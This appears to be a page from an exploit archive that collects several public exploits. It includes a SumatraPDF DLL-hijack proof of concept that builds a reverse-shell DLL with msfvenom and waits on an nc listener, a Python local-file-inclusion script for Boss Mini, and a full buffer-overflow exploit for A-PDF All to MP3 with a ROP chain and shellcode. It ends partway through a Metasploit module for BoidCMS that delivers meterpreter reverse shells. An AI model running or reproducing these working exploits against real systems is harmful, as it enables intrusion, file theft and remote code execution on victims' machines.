SumatraPDF version 3.5.2 suffers from a DLL hijacking vulnerability using CRYPTBASE.DLL. DLL hijacking in this version was already discovered by Ravishanka Silva in February of 2024 but the findings did not include this DLL.

    SumatraPDF 3.5.2 DLL Hijack# Exploit Title: Sumatra PDF 3.5.2 DLL Hijack# Date: 03.03.2024# Exploit Author: Krishna Vamshi Katta Rokkaiah# Vendor Homepage: https://www.sumatrapdfreader.org/free-pdf-reader# Software Link: https://www.sumatrapdfreader.org/download-free-pdf-viewer# Version: 3.5.2# Tested on: Windows 11# CVE : CVE-2024-25884Description:In Sumatra PDF version 3.5.2, a DLL hijacking vulnerability is possible allowing a local attacker to get a shell and execute code on the host system in context of the currently logged-on user. This is possible by creating / placing a malicious DLL in the installation directory. The affected DLL is CRYPTBASE.DLL.Proof of Concept:1. Use MSFVenom to create a malicious DLL:msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=7777 -f dll -o CRYPTBASE.DLL2. Copy this file to the Sumatra PDF installation folder:C:\Users\<username>\AppData\Local\SumatraPDF\3. Start a listener in attacking system:nc -nlvp 77774. Start the Sumatra PDF application and notice a reverse shell in the attacking system.Demo:https://drive.google.com/file/d/1dSJG_JwxPd9ztAzDs6xV4y83-c_83AOx/view

SumatraPDF 3.5.2 DLL Hijacking

Boss Mini version 1.4.0 suffers from a local file inclusion vulnerability.

    # Exploit Title: Boss Mini 1.4.0 - local file inclusion# Date: 07/12/2023# Exploit Author: [nltt0] (https://github.com/nltt-br))# CVE: CVE-2023-3643''' _____       _                              _____ /  __ \     | |                            /  ___|| /  \/ __ _| | __ _ _ __   __ _  ___  ___ \ `--. | |    / _` | |/ _` | '_ \ / _` |/ _ \/ __| `--. \| \__/\ (_| | | (_| | | | | (_| | (_) \__ \/\__/ / \____/\__,_|_|\__,_|_| |_|\__, |\___/|___/\____/                             __/ |                                            |___/                  '''from requests import post from urllib.parse import quotefrom argparse import ArgumentParsertry:    parser = ArgumentParser(description='Local file inclusion [Boss Mini]')    parser.add_argument('--domain', required=True, help='Application domain')    parser.add_argument('--file', required=True, help='Local file')    args = parser.parse_args()    host = args.domain    file = args.file    url = '{}/boss/servlet/document'.format(host)    file2 = quote(file, safe='')    headers = {        'Host': host,        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0',        'Content-Type': 'application/x-www-form-urlencoded',        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange',        'Referer': 'https://{}/boss/app/report/popup.html?/etc/passwd'.format(host)    }    data = {        'path': file2    }    try:        req = post(url, headers=headers, data=data, verify=False)        if req.status_code == 200:            print(req.text)    except Exception as e:        print('Error in {}'.format(e))          except Exception as e:    print('Error in {}'.format(e))

Boss Mini 1.4.0 Local File Inclusion

A-PDF All to MP3 Converter version 2.0.0 overflow exploit with DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain.

    #!/usr/bin/python# Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + some_memory_copy_function ROP chain# Date: 16 November 2023# Exploit Author: George Washington# Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm# Version: 2.0.0# Tested on: Windows 7 Ultimate 6.1.7601 SP1 Build 7601 x64# Based on: https://www.exploit-db.com/exploits/17275# Remarks: There are some changes to the ROP gadgets obtained from Alltomp3.exe# Video: https://youtu.be/_JEgdKjbtpIimport socket, structfile = "1.wav"size = 8000############ Parameters for HeapCreate() ############EXE = b"ZZZZ"                          # HeapCreate()EXE += b"AAAA"                         # RETEXE += struct.pack("<I", 0x00040000)   # Parameter 1 0x00040000EXE += struct.pack("<I", 0x00000000)   # Parameter 2 0x00000000EXE += struct.pack("<I", 0x00000000)   # Parameter 3 0x00000000EXE += b"YYYY"                         # HeapAlloc()EXE += b"BBBB"                         # RETEXE += b"CCCC"                         # Parameter 1 hHandleEXE += struct.pack("<I", 0x00000008)   # Parameter 2 0x00000008EXE += struct.pack("<I", 0x00000500)   # Parameter 3 0x00000500EXE += struct.pack("<I", 0x1002dd98)   # _memcpy_s()EXE += b"DDDD"                         # heap pointerEXE += b"EEEE"                         # heap pointerEXE += struct.pack("<I", 0x00000500)   # sizeEXE += b"GGGG"                         # shellcode pointerEXE += struct.pack("<I", 0x00000500)   # sizejunk = b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1#######################      STACK PIVOT      ###########################SEH = struct.pack("<I", 0x005CE870) # 0x005CE870  add esp 0x800, 4 pops, ret [alltomp3.exe]#######################    1. Get Stack Pointer to point to ZZZZ    ###########################ROP = struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xffffff1c)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to ZZZZ#######################    2. Get and set ZZZZ to HeapCreate        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D058) # HEAPCREATE IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    3. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1001939e)  # 0x1001939e: add esp, 0x000001A0 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    4. Go to HeapCreate                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffea4)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1002a3b5)*10 # 0x1002a3b5: ret  ;  (1 found) // pad it# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    5. Get Stack Pointer to point to YYYY    ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffe58)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to YYYY#######################    6. Get and set YYYY to HeapAlloc        ###########################ROP += struct.pack("<I", 0x1003c452) # 0x1003c452: pop eax ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += b"A" * 0x10ROP += struct.pack("<I", 0x1003D014) # HEAPALLOC IATROP += struct.pack("<I", 0x10033344) # 0x10033344: mov eax, dword [eax] ; pop esi ; ret  ;  (1 found) [Module : lame_enc.dll]ROP += struct.pack("<I", 0x41414141)# eax has HeapCreateROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    7. Set RET                               ###########################ROP += struct.pack("<I", 0x1003c452)  # 0x1003c452: pop eax ; ret  ;  (1 found)ROP += struct.pack("<I", 0x10014d32)  # 0x10014d32: add esp, 0x00000280 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A)  # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    8. Set hHEAP                             ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found) <- should return here and start executing hereROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** #######################    9. Go to HeapAlloc                      ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffdcc)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)# when heap create finishes, eax will have hHeapROP += struct.pack("<I", 0x1002a3b5)*20 # 0x1002a3b5: ret  ;  (1 found) // pad itROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    10. Get Stack Pointer to point to DDDD   ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x10004f62) # 0x10004f62: pop ebx ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffd5c)ROP += struct.pack("<I", 0x10007d44) # 0x10007d44: add eax, ebx ; pop ebx ; add esp, 0x08 ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*3ROP += struct.pack("<I", 0x100322fd) # 0x100322fd: mov ecx, eax ; mov eax, esi ; pop esi ; retn 0x0010 ;  (1 found)ROP += b"A" * 4# ecx points to DDDD#######################    12. Set RET                              ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += b"A"*0x10ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*4 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]#######################    13. DESTIN                                ###########################ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x100345ee)*8 # 0x100345ee: add eax, 0x04B60F10 ; inc ecx ; and eax, 0x04 ; ret  ;  (1 found) [Module : lame_enc.dll]* #######################    14. SOURCE                                ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0x000000a0)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x1003303A) # 0x1003303A  # MOV DWORD PTR DS:[ECX],EAX # RETN   [Module : lame_enc.dll]  ** ROP += struct.pack("<I", 0x10020004) # 0x10020004: xchg eax, ebp ; ret  ;  (1 found)#######################    15. GOTO _memcpy_s                        ###########################ROP += struct.pack("<I", 0x0042C7CB)  # 0x0042C7CB      # PUSH ESP # POP EDI # POP ESI # POP EBX # RETN [Module : Alltomp3.exe]  ** Null byte **ROP += b"A" * 8 ROP += struct.pack("<I", 0x1003176D) # 0x1003176D          # MOV EAX,EDI # POP ESI # RETN [Module : lame_enc.dll]  ** ROP += b"A" * 4ROP += struct.pack("<I", 0x1002fc2a) # 0x1002fc2a: pop edi ; ret  ;  (1 found)ROP += struct.pack("<I", 0xfffffc94)ROP += struct.pack("<I", 0x10035015) # 0x10035015: add eax, edi ; pop edi ; pop esi ; pop ebx ; pop ebp ; ret  ;  (1 found)ROP += struct.pack("<I", 0x41414141)*4ROP += struct.pack("<I", 0x005f5548) # 0x005f5548: xchg eax, esp ; ret  ;  (1 found)#######################  SHELLCODE  ###########################shellcode = b"\xcc" * 400real_shellcode = b"\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b"real_shellcode += b"\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09"real_shellcode += b"\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d"real_shellcode += b"\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03"real_shellcode += b"\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81"real_shellcode += b"\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04"real_shellcode += b"\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03"real_shellcode += b"\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3"real_shellcode += b"\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68"real_shellcode += b"\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68"real_shellcode += b"\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9"real_shellcode += b"\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65"real_shellcode += b"\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01"real_shellcode += b"\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68"real_shellcode += b"\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68"real_shellcode += b"\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68"real_shellcode += b"\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57"real_shellcode += b"\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c"real_shellcode += b"\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78"real_shellcode += b"\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"#######################  CONSTRUCT  ###########################SIZE = 500start_of_padding = b"A" * (SIZE-len(EXE)-len(shellcode))start_of_padding += shellcodestart_of_padding += EXESIZE = 1500RET_NOP_TO_ROP = b"A" * 0x70 + struct.pack("I", 0x1003c6aa) * 10 # RET#INT = struct.pack("I", 0x1000f2b3) + b"BBBB" # 0x1000f2b3: int3  ; pop esi ; ret  ;  (1 found)INT = struct.pack("I", 0x1003c6aa)*2rest_of_payload = RET_NOP_TO_ROP + INT + ROP # 160 + 14*4 + 172rest_of_payload += b"\x90" * 100rest_of_payload += real_shellcoderest_of_payload += b"\x90" * (SIZE-len(rest_of_payload))payload = junk + SEH + start_of_padding + rest_of_payloadREST = b"\x44" * (size-len(payload))payload += RESTfile = open("1.wav", "wb")file.write(payload)file.close()

A-PDF All To MP3 Converter 2.0.0 Overflow

This Metasploit module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS versions 2.0.0 and below. BoidCMS allows the authenticated upload of a php file as media if the file has the GIF header, even if the file is a php file.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework###class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  prepend Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'BoidCMS Command Injection',        'Description' => %q{          This module leverages CVE-2023-38836, an improper sanitization bug in BoidCMS version 2.0.0          and below.  BoidCMS allows the authenticated upload of a php file as media if the file has          the GIF header, even if the file is a php file.        },        'License' => MSF_LICENSE,        'Author' => [          '1337kid',    # Discovery          'bwatters-r7' # Metasploit Module        ],        'References' => [          [ 'CVE', '2023-38836' ],          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']        ],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'nix Command',            {              'Platform' => ['linux', 'unix', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',                'FETCH_COMMAND' => 'WGET',                'FETCH_WRITABLE_DIR' => '/tmp'              }            }          ],          [            'Windows Command',            {              'Platform' => ['windows', 'python'],              'DefaultOptions' => {                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter_reverse_tcp',                'FETCH_WRITABLE_DIR' => '%TEMP%',                'FETCH_COMMAND' => 'CURL'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-13',        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, 